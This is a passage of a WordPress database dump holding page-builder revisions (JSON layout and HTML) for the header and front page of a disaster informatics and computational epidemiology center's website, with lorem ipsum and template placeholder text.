h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                <!---->\n                <div data-colibri-id=\"22-h27\" class=\"h-global-transition-all h-heading style-215 style-local-22-h27 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-215 style-local-22-h27\">\n                    <!---->\n                    <!---->\n                    <h3 class=\"\">Center for Disaster Informatics &amp; Computational Epidemiology</h3>\n                  </div>\n                </div>\n                <div data-colibri-id=\"22-h28\" class=\"h-lead h-text h-text-component style-216 style-local-22-h28 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Enabling Data-Driven Disaster Assessment &amp; Planning\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"22-h29\" class=\"h-x-container style-217 style-local-22-h29 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-x-container-inner style-dynamic-22-h29-group style-217-spacing style-local-22-h29-spacing\"><span class=\"h-button__outer style-218-outer style-local-22-h30-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"/about/\"  data-colibri-id=\"22-h30\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-218 style-local-22-h30 position-relative\"><!----><!----> <span>Learn More</span></a>\n                    </span>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-220-outer style-local-22-h31-outer\">\n            <div data-colibri-id=\"22-h31\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-220 style-local-22-h31 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                <!---->\n                <div data-colibri-id=\"22-h32\" class=\"d-block style-221 style-local-22-h32 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/unsplash.jpg\" class=\"wp-image-258 style-221-image style-local-22-h32-image\">\n                      <div class=\"h-image__frame h-image__frame_shadow style-221-frameImage style-local-22-h32-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','header_front_page','','inherit','closed','closed','','22-revision-v1','','','2022-02-16 15:41:47','2022-02-16 15:41:47','',22,'https://gsudice.dataconn.net/?p=304',0,'revision','',0),(308,1,'2022-02-16 15:42:03','2022-02-16 15:42:03','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Overlappable\",\"attrs\":{\"id\":\"overlappable\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"20-c4\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c4\",\"index\":0,\"id\":\"20-c5\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/server\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c4\",\"index\":1,\"id\":\"20-c6\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"disease &amp; disaster modeling<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c4\",\"index\":1,\"id\":\"20-c7\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c8\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c8\",\"index\":0,\"id\":\"20-c9\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/database\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c8\",\"index\":1,\"id\":\"20-c10\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"data as a service<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c8\",\"index\":1,\"id\":\"20-c11\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c12\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c12\",\"index\":0,\"id\":\"20-c13\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/users\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c12\",\"index\":1,\"id\":\"20-c14\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"population disparities<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c12\",\"index\":1,\"id\":\"20-c15\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"}],\"id\":\"20-c3\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":272,\"type\":\"content\"}],\"id\":\"20-c2\",\"parentId\":\"20-c1\",\"partialId\":20,\"styleRef\":271,\"type\":\"content\"}],\"id\":\"20-c1\",\"partialId\":20,\"styleRef\":228,\"type\":\"content\"}','','','inherit','closed','closed','','168-revision-v1','','','2022-02-16 15:42:03','2022-02-16 15:42:03','',168,'https://gsudice.dataconn.net/?p=308',0,'revision','',0),(309,1,'2022-02-16 15:42:03','2022-02-16 15:42:03','<div data-colibri-id=\"20-c1\" class=\"style-228 style-local-20-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"20-c2\" id=\"overlappable\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-271 style-local-20-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"20-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-2 gutters-row-v-md-0 gutters-row-v-2 style-272 style-local-20-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-2 gutters-col-v-md-0 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c4-outer\">\n            <div data-colibri-id=\"20-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"20-c5\" class=\"h-icon style-274 style-local-20-c5 position-relative h-element\">\n                  <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c5-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"server\" viewBox=\"0 0 1792 1896.0833\"><path d=\"M128 1408h1024v-128H128v128zm0-512h1024V768H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zM128 384h1024V256H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm0-512q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm96 832v384H0v-384h1792zm0-512v384H0V640h1792zm0-512v384H0V128h1792z\"></path></svg></span></div>\n                <div\n                  data-colibri-id=\"20-c6\" class=\"h-global-transition-all h-heading style-275 style-local-20-c6 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-275 style-local-20-c6\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">disease &amp; disaster modeling</h5>\n                  </div>\n              </div>\n              <div data-colibri-id=\"20-c7\" class=\"h-text h-text-component style-276 style-local-20-c7 position-relative h-element\">\n                <!---->\n                <!---->\n                <div class=\"\">\n                  <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c8-outer\">\n          <div data-colibri-id=\"20-c8\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c8 position-relative\">\n            <!---->\n            <!---->\n            <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n              <!---->\n              <div data-colibri-id=\"20-c9\" class=\"h-icon style-274 style-local-20-c9 position-relative h-element\">\n                <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c9-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"database\" viewBox=\"0 0 1542.7035 1896.0833\"><path d=\"M768 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5T103 896 0 768V598q119 84 325 127t443 43zm0 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1536v-170q119 84 325 127t443 43zm0-384q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1152V982q119 84 325 127t443 43zM768 0q208 0 385 34.5t280 93.5 103 128v128q0 69-103 128t-280 93.5T768 640t-385-34.5T103 512 0 384V256q0-69 103-128t280-93.5T768 0z\"></path></svg></span></div>\n              <div\n                data-colibri-id=\"20-c10\" class=\"h-global-transition-all h-heading style-275 style-local-20-c10 position-relative h-element\">\n                <!---->\n                <div class=\"h-heading__outer style-275 style-local-20-c10\">\n                  <!---->\n                  <!---->\n                  <h5 class=\"\">data as a service</h5>\n                </div>\n            </div>\n            <div data-colibri-id=\"20-c11\" class=\"h-text h-text-component style-276 style-local-20-c11 position-relative h-element\">\n              <!---->\n              <!---->\n              <div class=\"\">\n                <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c12-outer\">\n        <div data-colibri-id=\"20-c12\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c12 position-relative\">\n          <!---->\n          <!---->\n          <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n            <!---->\n            <div data-colibri-id=\"20-c13\" class=\"h-icon style-274 style-local-20-c13 position-relative h-element\">\n              <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c13-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"users\" viewBox=\"0 0 1920 1896.0833\"><path d=\"M593 896q-162 5-265 128H194q-82 0-138-40.5T0 865q0-353 124-353 6 0 43.5 21t97.5 42.5T384 597q67 0 133-23-5 37-5 66 0 139 81 256zm1071 637q0 120-73 189.5t-194 69.5H523q-121 0-194-69.5T256 1533q0-53 3.5-103.5t14-109T300 1212t43-97.5 62-81 85.5-53.5T602 960q10 0 43 21.5t73 48 107 48 135 21.5 135-21.5 107-48 73-48 43-21.5q61 0 111.5 20t85.5 53.5 62 81 43 97.5 26.5 108.5 14 109 3.5 103.5zM640 256q0 106-75 181t-181 75-181-75-75-181 75-181T384 0t181 75 75 181zm704 384q0 159-112.5 271.5T960 1024 688.5 911.5 576 640t112.5-271.5T960 256t271.5 112.5T1344 640zm576 225q0 78-56 118.5t-138 40.5h-134q-103-123-265-128 81-117 81-256 0-29-5-66 66 23 133 23 59 0 119-21.5t97.5-42.5 43.5-21q124 0 124 353zm-128-609q0 106-75 181t-181 75-181-75-75-181 75-181 181-75 181 75 75 181z\"></path></svg></span></div>\n            <div\n              data-colibri-id=\"20-c14\" class=\"h-global-transition-all h-heading style-275 style-local-20-c14 position-relative h-element\">\n              <!---->\n              <div class=\"h-heading__outer style-275 style-local-20-c14\">\n                <!---->\n                <!---->\n                <h5 class=\"\">population disparities</h5>\n              </div>\n          </div>\n          <div data-colibri-id=\"20-c15\" class=\"h-text h-text-component style-276 style-local-20-c15 position-relative h-element\">\n            <!---->\n            <!---->\n            <div class=\"\">\n              <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>\n</div>\n</div>\n</div>','Front Page','','inherit','closed','closed','','20-revision-v1','','','2022-02-16 15:42:03','2022-02-16 15:42:03','',20,'https://gsudice.dataconn.net/?p=309',0,'revision','',0),(310,1,'2022-02-16 15:42:03','2022-02-16 15:42:03','{\"name\":\"hop-header\",\"id\":\"22-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":22,\"styleRef\":194,\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"anchor\":false,\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"backup\":{\"overlap\":{\"menu\":null}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h5\",\"parentId\":\"22-h4\",\"partialId\":22,\"styleRef\":247,\"type\":\"header\"}],\"id\":\"22-h4\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":246,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"id\":\"22-h6\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":248,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h14\",\"parentId\":\"22-h13\",\"partialId\":22,\"styleRef\":256,\"type\":\"header\"}],\"id\":\"22-h13\",\"parentId\":\"22-h12\",\"partialId\":22,\"styleRef\":255,\"type\":\"header\"}],\"id\":\"22-h12\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":254,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>&copy; 2022<\\/p>\"},\"id\":\"22-h17\",\"parentId\":\"22-h16\",\"partialId\":22,\"styleRef\":259,\"type\":\"header\"}],\"id\":\"22-h16\",\"parentId\":\"22-h15\",\"partialId\":22,\"styleRef\":258,\"type\":\"header\"}],\"id\":\"22-h15\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":257,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"22-h11\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":253,\"type\":\"header\"}],\"id\":\"22-h10\",\"parentId\":\"22-h9\",\"partialId\":22,\"styleRef\":252,\"type\":\"header\"}],\"id\":\"22-h9\",\"parentId\":\"22-h8\",\"partialId\":22,\"styleRef\":251,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\"}},\"id\":\"22-h8\",\"parentId\":\"22-h7\",\"partialId\":22,\"styleRef\":250,\"type\":\"header\"}],\"id\":\"22-h7\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":249,\"type\":\"header\"}],\"id\":\"22-h3\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":245,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"type\":\"header\",\"id\":\"22-h2\",\"partialId\":22,\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":263,\"slot\":null,\"parentId\":\"22-h20\",\"index\":0,\"id\":\"22-h21\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h20\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":262,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":265,\"slot\":null,\"parentId\":\"22-h22\",\"index\":0,\"id\":\"22-h23\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h22\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":264,\"type\":\"header\"}],\"id\":\"22-h19\",\"parentId\":\"22-h18\",\"partialId\":22,\"styleRef\":261,\"type\":\"header\"}],\"id\":\"22-h18\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":260,\"type\":\"header\",\"slot\":\"topBar\"}]},\"styleRef\":244},{\"name\":\"hop-hero\",\"props\":{\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"},\"anchor\":false},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"text\"}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Center for Disaster Informatics &amp; Computational Epidemiology<br>\"},\"id\":\"22-h27\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":215,\"type\":\"header\"},{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>Enabling Data-Driven Disaster Assessment &amp; Planning<br><\\/p>\"},\"id\":\"22-h28\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":216,\"type\":\"header\"},{\"name\":\"hop-button-group\",\"children\":[{\"name\":\"hop-button\",\"props\":{\"text\":\"Learn More\",\"link\":{\"value\":\"\\/about\\/\"}},\"id\":\"22-h30\",\"parentId\":\"22-h29\",\"partialId\":22,\"styleRef\":218,\"type\":\"header\"}],\"id\":\"22-h29\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":217,\"type\":\"header\"}],\"id\":\"22-h26\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":214,\"type\":\"header\"},{\"name\":\"hop-column\",\"children\":[{\"name\":\"hop-image\",\"id\":\"22-h32\",\"parentId\":\"22-h31\",\"partialId\":22,\"styleRef\":221,\"type\":\"header\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/unsplash.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":258,\"size\":\"\"}}],\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"media\"}}},\"id\":\"22-h31\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":220,\"type\":\"header\"}],\"id\":\"22-h25\",\"parentId\":\"22-h24\",\"partialId\":22,\"styleRef\":213,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"id\":\"22-h24\",\"partialId\":22,\"styleRef\":212,\"type\":\"header\",\"slots\":{\"downArrow\":[{\"name\":\"hop-down-arrow\",\"slots\":{\"button\":[{\"name\":\"hop-down-arrow-scroll-button-group\",\"children\":[{\"name\":\"hop-down-arrow-scroll-button\",\"id\":\"22-h35\",\"parentId\":\"22-h34\",\"partialId\":22,\"styleRef\":224,\"type\":\"header\",\"props\":{\"text\":\"down\"}}],\"id\":\"22-h34\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":223,\"type\":\"header\"}],\"icon\":[{\"name\":\"hop-down-arrow-scroll-icon\",\"id\":\"22-h36\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":225,\"type\":\"header\",\"props\":{\"name\":\"font-awesome\\/angle-down\"}}]},\"parentId\":\"22-h24\",\"slot\":\"downArrow\",\"id\":\"22-h33\",\"partialId\":22,\"styleRef\":222,\"type\":\"header\"}]}}]}','','','inherit','closed','closed','','23-revision-v1','','','2022-02-16 15:42:03','2022-02-16 15:42:03','',23,'https://gsudice.dataconn.net/?p=310',0,'revision','',0),(311,1,'2022-02-16 15:42:03','2022-02-16 15:42:03','<div data-colibri-id=\"22-h1\" class=\"page-header style-194 style-local-22-h1 position-relative\">\n  <!---->\n  <div data-colibri-navigation-overlap=\"false\" role=\"banner\" class=\"h-navigation_outer style-244-outer style-local-22-h2-outer\">\n    <!---->\n    <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"22-h2\" class=\"h-section h-navigation h-navigation d-flex style-244 style-local-22-h2\">\n      <!---->\n      <div class=\"h-section-grid-container h-section-fluid-container\">\n        <div data-nav-normal=\"\">\n          <div data-colibri-id=\"22-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-245 style-local-22-h3 position-relative\">\n            <!---->\n            <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n              <!---->\n              <div class=\"h-column h-column-container d-flex h-col-none style-246-outer style-local-22-h4-outer\">\n                <div data-colibri-id=\"22-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-246 style-local-22-h4 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"22-h5\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-247 style-local-22-h5 position-relative h-element\">\n                      <!---->\n                      <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n                        <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-247-image style-local-22-h5-image\">\n                        <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-247-image style-local-22-h5-image\">\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-248-outer style-local-22-h6-outer h-hide-sm\">\n                <div data-colibri-id=\"22-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-248 style-local-22-h6 h-hide-sm position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                    <!---->\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-249-outer style-local-22-h7-outer\">\n                <div data-colibri-id=\"22-h7\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-249 style-local-22-h7 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h8\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-mobile h-menu-horizontal h-dropdown-menu style-250 style-local-22-h8 position-relative h-element\">\n                      <!---->\n                      <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                      <div data-colibri-id=\"22-h9\" class=\"h-mobile-menu h-global-transition-disable style-251 style-local-22-h9 position-relative h-element\">\n                        <!---->\n                        <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-22-h9\" data-target-id=\"offcanvas-wrapper-22-h9\" data-offcanvas-overlay-id=\"offcanvas-overlay-22-h9\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n                          data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n                          <div class=\"icon-container h-hamburger-icon\">\n                            <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                              <!--Icon by Font Awesome (https://fontawesome.com)-->\n                              <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 